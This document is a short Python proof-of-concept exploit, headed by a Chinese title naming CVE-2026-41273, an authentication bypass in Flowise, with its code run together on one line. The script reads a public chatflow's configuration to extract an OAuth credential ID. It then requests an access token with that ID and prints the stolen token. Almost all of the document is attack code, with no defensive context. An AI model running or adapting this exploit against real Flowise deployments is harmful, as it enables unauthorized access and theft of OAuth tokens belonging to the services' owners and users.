CVE-2026-41273 Flowise认证绕过漏洞

import requests import json # Target configuration target_url = "http://localhost:3000" public_chatflow_id = "public-uuid-here" # Step 1: Access the public chatflow configuration endpoint # This endpoint leaks internal workflow data including OAuth credential identifiers config_endpoint = f"{target_url}/api/v1/chatflows/{public_chatflow_id}" print(f"[*] Attempting to access configuration endpoint: {config_endpoint}") try: response = requests.get(config_endpoint) if response.status_code == 200: data = response.json() print("[+] Successfully retrieved chatflow configuration.") # Step 2: Extract OAuth Credential ID from the response # Structure simulation: nodes -> data -> credentials -> id oauth_cred_id = None # Logic to traverse JSON and find the credential ID if 'nodes' in data: for node in data['nodes']: if 'data' in node and 'credentials' in node['data']: oauth_cred_id = node['data']['credentials'].get('id') break if oauth_cred_id: print(f"[+] Found OAuth Credential ID: {oauth_cred_id}") # Step 3: Use Credential ID to obtain/refresh OAuth 2.0 Access Token # Exploiting the authentication bypass to get a token token_endpoint = f"{target_url}/api/v1/oauth/token" payload = { "credentialId": oauth_cred_id, "grantType": "refresh_token" } token_resp = requests.post(token_endpoint, json=payload) if token_resp.status_code == 200: token_data = token_resp.json() print(f"[!] Exploit Successful!") print(f"[+] Access Token: {token_data.get('access_token')}") else: print("[-] Failed to obtain token using the credential ID.") else: print("[-] No OAuth credentials found in the configuration.") else: print(f"[-] Failed to access endpoint. Status code: {response.status_code}") except Exception as e: print(f"Error during exploitation: {e}")